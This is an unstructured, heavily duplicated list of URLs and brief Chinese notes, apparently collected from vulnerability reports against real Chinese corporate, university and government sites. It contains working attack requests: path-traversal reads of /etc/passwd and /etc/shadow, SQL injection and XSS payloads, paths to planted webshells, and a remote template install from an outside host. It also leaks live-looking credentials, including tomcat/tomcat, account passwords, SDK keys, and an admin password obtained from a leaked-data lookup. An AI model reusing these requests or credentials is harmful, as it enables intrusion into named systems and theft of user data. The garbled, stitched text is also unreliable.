http://jcc.bjmu.edu.cn/cgi-bin/test-cgi http://certify.yiji.com/index/index.htm http://pawn.ecitic.com/mainBusiness http://f.bj.e-health.org.cn/sso/ssoLogin_input1.action http://www.yilvcheng.com/admin.php http://mail.sh.cn/ http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/work/bea/citizenmail/NewMailSh/smmail/jsp/Action/DownFile.jsp&fileName=DownFile.jsp http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/usr/local/apache2/conf/httpd.conf&fileName=httpd.conf http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/etc/passwd&fileName=passwd http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/etc/shadow&fileName=shadow http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/work/apachelogs/info.smmail.cn_access_log&fileName=info.smmail.cn_access_log www.smmail.cn_erro_log www.smmail.cn_erro_log www.eshimin.com filetype:xls http://ehelp.travelsky.com/oa_internal/chief_duty/dsdetail.jsp?dsid=888 http://ehelp.travelsky.com//oa_internal/chief_duty/dsdetail.jsp?dsid=888 http://122.119.124.11/Login.action http://mail.gjqh.com.cn/owa/auth/logon.aspx?replaceCurrent=1&url=http%3a%2f%2fmail.gjqh.com.cn%2fowa%2f http://mail.gjqh.com.cn:9090/login.jsp http://mail.gjqh.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd http://mail.gjqh.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/shadow http://oa.tclking.com/Login.aspx http://www.super8.com.cn/ http://222.177.118.172:8084/vmain/login.jsp http://222.177.118.172:8084/ServiceAction/com.velcro.base.DataAction?sql= http://statzhajinhua.3gforgame.com:8080/jinhua/index.php/login http://www.yidiao.net/admin/sysadmin/login http://122.11.49.249/sur/survey.php?id=3626 http://jcc.bjmu.edu.cn/ http://fxzx.bjmu.edu.cn http://yygl.bjmu.edu.cn/ http://netc.jnu.edu.cn http://jsjxfzzx.jju.edu.cn/ http://hhxy.jju.edu.cn/ http://gc.ustb.edu.cn/ http://user.baofeng.com/user/?a=updateinfo&username=aaa&name=&sex=1&provinceId=110000&cityId=110100&birthdayStr=&birthday=&interest=25%27&intro=&edu=&edu_bgd=&vocation=&is_mar=&mar=0&province=110000&city=110100&county=110101&film_type=&film_fes=&mon_pay=&contact=哈哈哈&callback=User.changeBaseInfoResult http://user.baofeng.com/user/?a=updateinfo&username=aaa&name=&sex=1&provinceId=110000&cityId=110100&birthdayStr=&birthday=&interest=25%27&intro=&edu=&edu_bgd=&vocation=&is_mar=&mar=0&province=110000&city=110100&county=110101&film_type=&film_fes=&mon_pay=&contact=哈哈哈&callback=User.changeBaseInfoResult"/ http://shop.baofeng.com/pay/pay_choose/0/0/2/?code=a%22/%3E%3Ch1%3Eaaa http://user.baofeng.com/user/?a=sendCheckMail&callback=%3Ch1%3Eaaa http://www.baofeng.com/q_YWFhJyUzQmFsZXJ0KCklM0J2YXIlMjBiJTNEJw== http://adorders.huiyan.baofeng.com/Acl/user/loginin/message/%3Ch1%3Eaaa http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://reachmax.addnewer.com/oauth/authorize.do http://www.comba-telecom.com http://www.comba-telecom.com/ckfinder/ckfinder.html http://www.comba.com.cn同样存在这个漏洞,但由于是IIS7.5无法利用 www.comba.com.cn的后台也可以登录。可以随意修改内容 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://oa6.53kf.com/lib/common/communication/bglogin.php?action=check&domain_name=10000079&flow_id=3580 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://csr.hnagroup.com/ http://csr.hnagroup.com/hna-commonweal/images/pic/commonwealuser/jspcmd1.jsp zhanghao:mixiaofei mima:mixiaofei zhanghao:hnauser mima:123456 http://www.cpic.com.cn/cpic/index.shtml?cmpid=nim_bd_000057 http://118.122.168.126:90/ http://app.hbcic.gov.cn/anquan/doc/error.asp http://app.hbcic.gov.cn/anquan/doc/MSSQL.asp http://app.hbcic.gov.cn/anquan/doc/x.asp www.utouu.com http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx http://gzcx.tynu.edu.cn/KFweb/admin/GenerateRegUser.aspx http://210.45.92.21/admin/GenerateRegUser.aspx http://cwc.sxufe.edu.cn/KFweb/admin/GenerateRegUser.aspx http://www.shcdkf.com/kfweb/admin/GenerateRegUser.aspx http://221.5.51.228/cjb/admin/GenerateRegUser.aspx http://cwch.ahu.edu.cn/querynetweb/admin/GenerateRegUser.aspx http://www.cqvie.com/xfcxsq/admin/GenerateRegUser.aspx http://59.72.128.44/KfWeb/admin/GenerateRegUser.aspx http://cycwc.gzife.edu.cn/kefa/admin/GenerateRegUser.aspx http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx为例: http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx http://www.500mi.com/,发现存在Elasticsearch http://m.zhuna.cn/ http://m.zhuna.cn/wap/index.php/index/hotelSearch?city=x http://m.zhuna.cn/wap/index.php/index/hotelSearch?city=x http://oa6.53kf.com/cust_workflow_edit.php?arg=p10000079_10060875&entrance=cust&left=cust&flow_id=3580&fnode_only=1&remote_call=1&sign=c16ac3dbf9b532665acef7c076070a6c3f7ca660&t=6858976974&cust_field_val=12345122%40qq.com http://ued.baidu.com/ http://luntan.land.tcl.com/user/Default.aspx http://luntan.land.tcl.com/admin/Include/ChannelList.aspx http://luntan.land.tcl.com/admin/index.aspx www.myzyy.com http://www.myzyy.com/backoffice/tempsys/installtmp.aspx?tname=c004&tmp=http://view.86mt.com/getfile.aspx?FileName=c004 http://view.86mt.com/getfile.aspx?FileName=c004 http://www.myzyy.com/backoffice/tempsys/installtmp.aspx?tname=c004&tmp=http://www.xxx.com/c004.zip http://www.myzyy.com/template/c004/2.aspx http://pm.haiertvbic.com/login http://www.sffda.gov.cn/news/c/?id=1110 http://v8.workyi.com/ http://v8.workyi.com/persondh/latest.aspx?key= version:2.5.130916 http://gz.jxrcrsw.com/persondh/latest.aspx?key= http://beijing.ahyylw.com/persondh/latest.aspx?key= http://nyb.shibufangcao.com/persondh/latest.aspx?key= http://www.189051.com/persondh/latest.aspx?key= http://www.e855.net/persondh/latest.aspx?key= http://www.tjkyhr.com/persondh/latest.aspx?key= http://beijing.ahyylw.com/persondh/latest.aspx?key= http://163.15.186.37 http://203.71.247.31 http://163.20.51.250 http://140.128.164.7 http://163.32.90.101 http://220.134.145.150 http://140.129.117.243 http://120.105.163.96 http://27.223.70.11/register.asp http://27.223.70.11 http://地址/PowerRecordY.aspx?Date=2015&LoopName=1.1 https://www.hushmail.com/preview/hushmail/ http://passport.liba.com/findPassword.php?step=5&uid=8155678&code=66465e6bae84800bf2e4e82369eb32dc http://test.imxiaomai.com/ http://27.223.70.28:8081/bljh/ http://5.haierabc.com/ http://www2.cmu.edu.tw/~alumni/admin/index.php http://www2.cmu.edu.tw/~alumni/upload/File/jing.php http://www.hoau.net/rczp/show_city.php http://zqb.creditease.cn http://www.aoyou.com/leyooisland.htm?refurl=http%3A%2F%2Fwww.aoyou.com%2Fshanghai http://biz.aoyou.com/ http://www.airport.gx.cn/ http://www.airport.gx.cn:8089/fckeditor/editor/dialog/fck_about.html http://58.59.137.194:8089/UserFiles/File/111/sss.jsp?o=index http://58.59.137.194:8089/UserFiles/File/111/test.jsp http://www.super8.com.cn/ http://allthingshair.youku.com/api/index.php?r=video/GetAccountVideoLastWeekByCategoryIdHasSpecialVideo http://allthingshair.youku.com/api/index.php?r= http://sqlmap.org http://116.112.15.30/Account/LogOn/ http://www.scup.cn/press.asp?id=353 http://shop.edu-founder.com/PageProductsList.aspx?cid=1&DpName=1 http://116.213.120.35/,弱口令admin http://gamedb.766.com/sm/site/view/hero_id/updatexml%281,concat%280x7e,%28user%28%29%29%29,0%29 http://ctd.ruc.edu.cn/newslist.php?type=2 http://gs.njfu.edu.cn/Gmis/zs/fbzsksInfolist.aspx http://202.203.225.17:8080/Gmis/zs/fbzsksInfolist.aspx http://218.75.27.177/Gmis/zs/fbzsksInfolist.aspx http://yjsy.wmu.edu.cn:8080/Gmis/zs/fbzsksInfolist.aspx http://101.76.99.20/Gmis/zs/fbzsksInfolist.aspx http://61.187.179.68:8080/Gmis/zs/fbzsksInfolist.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/zs/fbzsksInfolist.aspx http://210.43.126.80:8080/Gmis/zs/fbzsksInfolist.aspx http://211.64.205.214/Gmis/zs/fbzsksInfolist.aspx http://210.43.126.80:8080/Gmis/zs/fbzsksInfolist.aspx http://210.43.126.80:8080 http://zoo.e-tobe.com/content.php?id=19&sub=2 http://wiki.smart-tv.cn/index.php http://open.smart-tv.cn/chzk/ http://www.xscbs.com.cn/xishi/index.php?file=news&smid=14&nid=1614 http://kmchao.com/ http://www.yngaogu.com/thi.php?fid=12 http://www.labreal.cn/thi.php?fid=93 http://kmajww.com/thi.php?fid=2 http://www.cxhhhq.com/thi.php?fid=5 http://www.yncxhq.com/thi.php?fid=8 http://ynrsy.com/thi.php?fid=1 http://www.fxsqssmzw.cn/thi.php?fid=37 http://www.csiclh.com/thi.php?fid=57 http://a1811237.sn4764.gzonet.com/thi.php?fid=21 http://www.ynhengman.com/thi.php?fid=8 http://www.ynhcadv.com/thi.php?fid=30 http://www.cngooye.com/thi.php?fid=13 http://www.gyrunjia.com/thi.php?fid=41 http://www.fdkbdf.com/thi.php?fid=52 http://www.ynskzmgc.com/thi.php?fid=29 http://gaogu.gotoip4.com/thi.php?fid=10 http://www.gzqhds.com/thi.php?fid=14 http://www.大理双廊.com/thi.php?fid=26 http://kmsettle.com/thi.php?fid=6 http://ynasyl.com/thi.php?fid=12 http://www.ynymbz.com/thi.php?fid=62 http://www.winstown.com/thi.php?fid=15 http://www.kmzzkj.com/thi.php?fid=22 http://www.xgrzrt.com/thi.php?fid=20 http://www.mufoedu.com/thi.php?fid=24 http://www.mufoedu.com/thi.php?fid=24 http://www.kmzzkj.com/thi.php?fid=22 www.dinghuaren.com http://www.chinakjzx.com/columnlist.do?ID=14 http://www.chinakjcxdb.com/columnlist.do?ID=14 http://www.zgwscy.com/columnlist.do?ID=14 http://115.47.21.161:8080/columnlist.do?ID=14 http://www.chinazwyl.com/ http://www.vimigou.com/home_login.action etkqqda.gov.cn/admin/default.asp http://m.88.com.cn http://api.88.com.cn http://bidding.ztesoft.com/ http://bidding.ztesoft.com:80/ http://kmchao.com/ http://www.yngaogu.com/thi_details.php?id=285 http://www.cxhhhq.com/thi_details.php?id=129 http://www.labreal.cn/thi_details.php?id=23 http://www.jdzs666.com/thi_details.php?id=97 http://www.yn-led.com/thi_details.php?id=342 http://www.ynyasheng.com/thi_details.php?id=243 http://www.yncxhq.com/thi_details.php?id=138 http://ynrsy.com/thi_details.php?id=12 http://www.kmajww.com/thi_details.php?id=32 http://www.ynhcadv.com/thi_details.php?id=161 http://www.gzqhds.com/thi_details.php?id=84 http://www.ynznjd.com/thi_details.php?id=43 http://www.yishengcao.com/thi_details.php?id=19 http://www.fxsqssmzw.cn/thi_details.php?id=74 http://www.kmyrdn.com/thi_details.php?id=29 http://www.winstown.com/thi_details.php?id=6 http://a1811237.sn4764.gzonet.com/thi_details.php?id=482 http://www.kmxycm.com/thi_details.php?id=47 http://www.ynhufeng.com/thi_details.php?id=303 http://ynwms.com/thi_details.php?id=105 http://www.csiclh.com/thi_details.php?id=110 http://yishengcao.gotoip55.com/thi_details.php?id=50 http://www.ynrjnk.com/thi_details.php?id=110 http://www.csiclh.com/thi_details.php?id=110 http://www.ynrjnk.com/thi_details.php?id=110 XSS1:http://www.ynrjnk.com/liuyan.php http://www.chinakjzx.com/author/check.ashx?name= http://www.chinakjcxdb.com/author/check.ashx?name= http://www.zgwscy.com/author/check.ashx?name= http://115.47.21.161:8080/author/check.ashx?name= http://www.chinazwyl.com/author/check.ashx?name= http://gs.njfu.edu.cn/Gmis/xwyygl/xwyycjlr.aspx http://202.203.225.17:8080/Gmis/xwyygl/xwyycjlr.aspx http://218.75.27.177/Gmis/xwyygl/xwyycjlr.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xwyygl/xwyycjlr.aspx http://101.76.99.20/Gmis/xwyygl/xwyycjlr.aspx http://61.187.179.68:8080/Gmis/xwyygl/xwyycjlr.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xwyygl/xwyycjlr.aspx http://210.43.126.80:8080/Gmis/xwyygl/xwyycjlr.aspx http://210.43.126.80:8080/Gmis/xwyygl/xwyycjlr.aspx http://210.43.126.80:8080 http://mhz.pw/game/SOP/01.php http://gs.njfu.edu.cn/Gmis/xw/xwzInfoListcp.aspx http://202.203.225.17:8080/Gmis/xw/xwzInfoListcp.aspx http://218.75.27.177/Gmis/xw/xwzInfoListcp.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwzInfoListcp.aspx http://101.76.99.20/Gmis/xw/xwzInfoListcp.aspx http://61.187.179.68:8080/Gmis/xw/xwzInfoListcp.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwzInfoListcp.aspx http://210.43.126.80:8080/Gmis/xw/xwzInfoListcp.aspx http://211.64.205.214/Gmis/xw/xwzInfoListcp.aspx http://211.64.205.214/Gmis/xw/xwzInfoListcp.aspx http://211.64.205.214 www.07073.com http://phpems.net http://phpems.net/2014 http://211.138.248.91:8018/Article/View1.aspx?Class=010301&ID=20 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.vcooline.com/ https://github.com/407435208/wsite/blob/56cf9633072df591fffef0485ecb0fa6787168c5/wsite-mvc/src/main/resources/WEB-INF/config/applicationcontext-mvc.xml https://github.com/407435208/wsite/blob/7ca0e39c0399ce7161217bcaa54b2fe3ddce9413/wsite-dal/target/classes/WEB-INF/config/database.properties https://github.com/407435208/wsite/blob/7ca0e39c0399ce7161217bcaa54b2fe3ddce9413/wsite-dal/target/classes/WEB-INF/config/database_prod.properties https://github.com/407435208/wsite/blob/7ca0e39c0399ce7161217bcaa54b2fe3ddce9413/wsite-dal/target/classes/WEB-INF/config/database_staging.properties http://www.gzsadr.gov.cn/showinfo.asp?id=558 http://www.zhong-bei.com/admin/index.asp http://scc.cufe.edu.cn/jyw_zc/detail.jsp?seq=2310 http://www.goodnews.org.tw/content.php?id=51092 http://kmchao.com/ http://www.ynrjnk.com/sec_details.php?id=149 http://ynwms.com/sec_details.php?id=339 http://www.ynymbz.com/sec_details.php?id=614 http://www.省肥灯水溶肥.com/sec_details.php?id=164 http://www.ynmsksw.com/sec_details.php?id=685 http://www.yncgwh.com/sec_details.php?id=14 http://www.ynyyky.com/sec_details.php?id=24 http://ynjzzsdlmzg.gotoip55.com/sec_details.php?id=277 http://www.ynyyky.com/sec_details.php?id=246 http://www.娇俏水溶肥.com/sec_details.php?id=27 http://www.hefuedu.cn/sec_details.php?id=108 http://ynwms.com/sec_details.php?id=309 http://www.hefuedu.cn/sec_details.php?id=116 http://www.ynrjnk.com/sec.php?oid=2 http://www.ynymbz.com/sec.php?oid=2 http://www.ynmsksw.com/sec.php?tid=40 http://www.yncgwh.com/sec.php?oid=3 http://www.ynyyky.com/sec.php?oid=3 http://www.hefuedu.cn/sec.php?oid=3 http://ynwms.com/sec_details.php?id=339 http://www.hefuedu.cn/sec.php?oid=3 http://www.dongfeng.net/dfnews_searchMoreNews.do http://gs.njfu.edu.cn/Gmis/zs/fbzsjzInfoalist.aspx http://202.203.225.17:8080/Gmis/zs/fbzsjzInfoalist.aspx http://218.75.27.177/Gmis/zs/fbzsjzInfoalist.aspx http://yjsy.wmu.edu.cn:8080/Gmis/zs/fbzsjzInfoalist.aspx http://101.76.99.20/Gmis/zs/fbzsjzInfoalist.aspx http://61.187.179.68:8080/Gmis/zs/fbzsjzInfoalist.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/zs/fbzsjzInfoalist.aspx http://210.43.126.80:8080/Gmis/zs/fbzsjzInfoalist.aspx http://211.64.205.214/Gmis/zs/fbzsjzInfoalist.aspx http://211.64.205.214/Gmis/zs/fbzsjzInfoalist.aspx http://211.64.205.214 http://www.jsbbzy.com/manage/basepage/login_init.action http://www.jsbbzy.com/bak.jsp http://112.124.55.6/SXHB/ http://112.124.55.6/SXHB/1.txt http://112.124.55.6/ www.gksq.net,得到管理员email:wuyinglai@163.com,查社工库得到密码:777wyl,登陆wordpress后台,随便插件写个一句话, http://www.dlinfo.gov.cn/kjxxw.php?id=110490 http://gs.njfu.edu.cn/Gmis/xwyygl/xwyycjcx.aspx http://202.203.225.17:8080/Gmis/xwyygl/xwyycjcx.aspx http://218.75.27.177/Gmis/xwyygl/xwyycjcx.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xwyygl/xwyycjcx.aspx http://101.76.99.20/Gmis/xwyygl/xwyycjcx.aspx http://61.187.179.68:8080/Gmis/xwyygl/xwyycjcx.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xwyygl/xwyycjcx.aspx http://210.43.126.80:8080/Gmis/xwyygl/xwyycjcx.aspx http://210.43.126.80:8080/Gmis/xwyygl/xwyycjcx.aspx http://210.43.126.80:8080 http://121.18.73.204:7100 http://xgzljtvip.com/ http://xgzljtvip.com/manage/basepage/merchantsLogin_doInit.action http://xgzljtvip.com/bak.jsp http://202.98.57.28:8088/ http://www.cbbtv.com/showredirect.do?type=3 http://www.nbfwz.cn/index/index.do http://itunes.apple.com/cn/app/nei-han-duan-zi/id517166184 http://www.ztesoft.com:18085/sq/emailcheck.aspx http://www.ztesoft.com:18085/ www.ztesoft.com:18085 http://open.lenovo.com/data/multiDimensionAction.do?method=getTrendData&reportName=MultiDimensionData http://si.buaa.edu.cn/download.php?file_name=../../../../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././passwd http://wallpaper-sogou.open.moxiu.net/ http://wallpaper-sogou.open.moxiu.net/index.php?do=Album.Show&id=20170 http://apt.feng.com/4001133 v2.php/User/cancelFollow http://www.cup.edu.cn/geosci/,http://www.cup.edu.cn/oil/等学院网站上的调剂复试名名单),代入其中即可得到 http://gmis.cup.edu.cn/zsgl/fsgl/tjxxView.aspx?bmh=114145111640657 http://blog.99tk.cn/wp-content/uploads/2015/03/20150319-141011-336.txt http://blog.99tk.cn/wp-content/uploads/2015/03/20150319-141147-926.txt v.cn/templet/yy***** http://www.hanmasoft.cn/ http://jy.qhnu.edu.cn/index_module.php?module_name=department_allinfo&action=0&dep_id=8 http://zsjy.hnmeida.com.cn/job/index_module.php?module_name=department_allinfo&action=0&dep_id=9 http://jyb.cdutetc.cn/index_module.php?module_name=department_allinfo&action=0&dep_id=9 http://jyzd.lmu.cn/index_module.php?module_name=department_allinfo&action=0&dep_id=9 http://jy.hnrpc.com/index_module.php?module_name=department_allinfo&action=0&dep_id=7 http://www.yf1668.com/ http://112.124.41.23:38888/ http://112.124.41.23:38888/SystemManage/BuMenInfo.aspx?Type=&DirID=0 http://112.124.41.23:38888/GongGao/GongGao.aspx?Type=a http://112.124.41.23:38888/WorkFlow/PublicSealLog.aspx?Type=c http://112.124.41.23:38888/WorkFlow/PublicSealL http://sqlmap.org http://www.dlwsxx.com/ws2004/model/login1.asp http://www.fzjcxx.cn/ws2004/model/login1.asp http://www.nxyancgjzx.com/ws2004/model/login1.asp http://www.sgtjb.com/ws2004/model/login1.asp http://www.sdwhys.com/ws2004/model/login1.asp http://www.zjnksyzx.com:8801/ws2004/model/login1.asp inurl:ws2004/Model/ http://www.fzjcxx.cn/ws2004/Model/default.asp?KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0 http://ac.cqupt.edu.cn http://ac.cqupt.edu.cn/gclx/nav.php?cat_id=50 http://ac.cqupt.edu.cn/gclx//admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://ac.cqupt.edu.cn/gclx/admin/ http://ac.cqupt.edu.cn/gclx/admin/uploads/media/1369642461_conf.php http://www.hanmasoft.cn/ query:SELECT Error:You http://jyb.cdutetc.cn/index_major_detail.php?btab=1&major_id=69&indexstyle=1 http://jyw.hftc.edu.cn/index_major_detail.php?btab=1&major_id=7466&indexstyle=1 http://jy.hnrpc.com/index_major_detail.php?btab=1&major_id=57&indexstyle=1 http://218.75.196.222/index_major_detail.php?btab=1&major_id=56&indexstyle=1 http://110.189.108.6/index_major_detail.php?btab=1&major_id=115&indexstyle=1 http://58.47.177.161/job/index_major_detail.php?btab=1&major_id=51&indexstyle=0 http://hqjt.ncist.edu.cn/news_eg.php?NEWS_ID=502 http://202.97.223.148:8090/ http://120.42.37.93:10003/dzsbxz/phone-xmsb/download.html http://218.104.135.77:9010/mMSW/mobile/sbjf/querySbjfxx.html?maxRows=20&startDate=201501&endDate=201503¤tPage=1&xzdm00=1&zmlx00=01&ylz_token=*马*赛*克* http://218.104.135.77:9010/mMSW/mobile/yibao/queryYdfylb.html?maxRows=10&qsrqi=20130320&jzrqi=20150320¤tPage=1&ylz_token=*马*赛*克* http://zhlm.cpoc.cn/houtai_admin/login!shengcms.action?pkid=tszsyonghu http://www.iooqoo.com/ http://member.iooqoo.com/validate2.html http://www.looqoo.com.cn/ http://member.looqoo.com.cn/validate2.html http://www.boojoo.com.cn/ http://member.boojoo.com.cn/validate2.html http://www.4-3.com.cn/about/contact.html http://www.cocopex.com/www.qudao.biz/about/contact.html http://www.taideng.biz/about/contact.html http://www.oooggg.com/about/contact.html http://www.z-china.com/about/contact.html http://www.rooloo.cn/about/contact.html http://www.h-c.com.cn/about/contact.html http://www.m-i.cn/about/contact.html http://www.eooaoo.com/about/contact.html http://www.china1f.com/about/contact.html http://www.ioomoo.com/about/contact.html http://www.powercn.net/about/contact.html http://www.hhhiii.com/about/contact.html http://www.dianshi.biz/about/contact.html http://www.n-g.com.cn/about/contact.html http://www.rooqoo.com.cn/about/contact.html http://www.fffrrr.com.cn/about/contact.html http://www.c-yl.com/about/contact.html http://www.mooioo.cn/about/contact.html http://www.caiyin.net.cn/about/contact.html http://www.stonew.com/about/contact.html http://www.china-waste.com/about/contact.html http://www.toozoo.com.cn/about/contact.html http://www.shoutao.biz/about/contact.html http://www.y-y.com.cn/about/contact.html http://www.fuhefei.biz/about/contact.html http://www.xiaoyouxi.biz/about/contact.html http://www.s-u.cn/about/contact.html http://www.mugui.com.cn/about/contact.html http://www.diandongche.biz/about/contact.html http://www.cizhuan.biz/about/contact.html http://www.zhineng.biz/about/contact.html http://www.toolchina.net/about/contact.html http://nbsw.yundasys.com/wdkhxx/ajax.php http://gw.apabi.com/ https://github.com/fangxuezheng/doc http://59.51.45.225:82/Newfile.txt http://219.239.91.112/sdkproxy/querybalance.action?cdkey=3SDK-EMY-0130-NBTRS&password=194342 http://219.239.91.112/sdkproxy/querybalance.action?cdkey=3SDK-EMY-0130-NBTRT&password=198165 http://219.239.91.112/sdkproxy/querybalance.action?cdkey=3SDK-EMY-0130-JFXNO&password=569244 http://yzd.hyhhgroup.com/admin/menu.php http://app.finance.ifeng.com/money/insurance_rs_detail.php?qtype=id&query=1053 http://gw.apabi.com/ http://ebook.nwu.edu.cn/AddMyFavourite.asp?lang=gb&DocID=1 http://dlib.gsjtxy.edu.cn/dlib/AddMyFavourite.asp?lang=gb&DocID=1 http://book.sdjnlib.net:81/AddMyFavourite.asp?lang=gb&DocID=1 http://apabi.hfslib.com/AddMyFavourite.asp?lang=gb&DocID=1 http://211.81.174.133:81/dlib/AddMyFavourite.asp?lang=gb&DocID=1 http://125.36.68.156/ http://125.36.68.161/ http://125.36.68.165/ http://125.36.68.159/ http://125.36.68.144/ http://211.155.227.151/ http://125.36.68.229/ http://125.36.68.149/ http://125.36.68.132/ http://125.36.68.185/ http://125.36.68.156/status_dev_info_t.gch http://125.36.68.156/manager_dev_config_t.gch http://125.36.68.156/manager_log_conf_t.gch http://www.appchina.com/account/retrieve,验证码输入一次即可,用户名存在则OK,用户名不存在则提示无法登陆。 rain:15160899762 http://chong.appchina.com/index.php/ https://ad.toutiao.com/login/ https://ad.toutiao.com/forgot/ www.cpoc.cn http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.gzevergrandefc.com/Manage/AdminLogin.aspx http://220.161.148.22:8891/fkoa/login!exit.action http://202.97.155.178/ http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://mzoa.zsmz.com/OAWeb2/common.action http://202.85.213.23:8081/login.php http://www.mbaschool.com.cn/fenxiao/shenyang/index.html http://fjqdoa.fjgpc.com:9999/fjqdoa/loginAction.action http://www.cnern.org/index.action http://www.cnern.org/getContent.action?id=24662&class_id=29&article_class_id=8 http://mail.tutuapp.com/WebResource.axd?d=PG-vNzrJAe0x8wW9Qe32fQ2 url:http://218.241.144.110:80/manager/html user:tomcat pass:tomcat http://218.241.144.110/wooyun/ http://data.auto.cnfol.com/bseries/photo/1512 http://www.yuanweb.cn http://v.gd10010.cn/vip/index.do?env=wap&cps=RX0427,这个页面有最底下有一个“宽带业务-新装宽带”,洞就在这里了 km2.in/xss.php http://118.194.34.122/ http://118.194.34.122 http://dev.paojiao.cn:8080/ http://os.tjaee.com/admin/login.jsp http://59.55.33.137:8040/mainpage/articleclasslist.aspx?classid=1 http://oa.jxgxedu.gov.cn/mainpage/articleclasslist.aspx?classid=11 http://www.gznoa.com/mainpage/articleclasslist.aspx?classid=1 http://218.87.140.106/mainpage/articleclasslist.aspx?classid=1 http://59.55.33.137:8010/mainpage/articleclasslist.aspx?classid=1 http://www.ybzhbj.gov.cn/Y01/ws_xw/index.asp http://www.ybxfj.gov.cn/Y01/ws_xw/index.asp http://www.yjbhdl.com/Y01/ws_xw/index.asp http://www.caoxianyy.com/cxyy/Y01/ws_xw/index.asp http://www.ybcyyy.net/cyyy/Y01/ws_xw/index.asp http://yxzy.hrbmu.edu.cn/ http://yxzy.hrbmu.edu.cn/cvpcn/showArt.asp?id=467 www.yiban.cn/user/index/index/user_id/1974385 http://vmi.tclking.com/Default.aspx http://www.galaxywind.com/ https://github.com/yuanzhhh/galaxywind http://59.55.33.137:8040/mainpage/articlefindselect.aspx http://oa.jxgxedu.gov.cn/mainpage/articlefindselect.aspx http://www.gznoa.com/mainpage/articlefindselect.aspx http://218.87.140.106/mainpage/articlefindselect.aspx http://59.55.33.137:8010/mainpage/articlefindselect.aspx http://**.**.**/wooyun/_ http://zwx.eyougame.com/Giftpack http://125.35.15.47/SwapWebService/querySwap.do;jsessionid=FF619D6AC2C986E7213D8B87754392E2 http://yytv.cc/ http://igogo.enavi.189.cn/sys/loginout.do http://igogo.enavi.189.cn/upload/uploadapk.htm http://igogo.enavi.189.cn/sys/mainindex.do 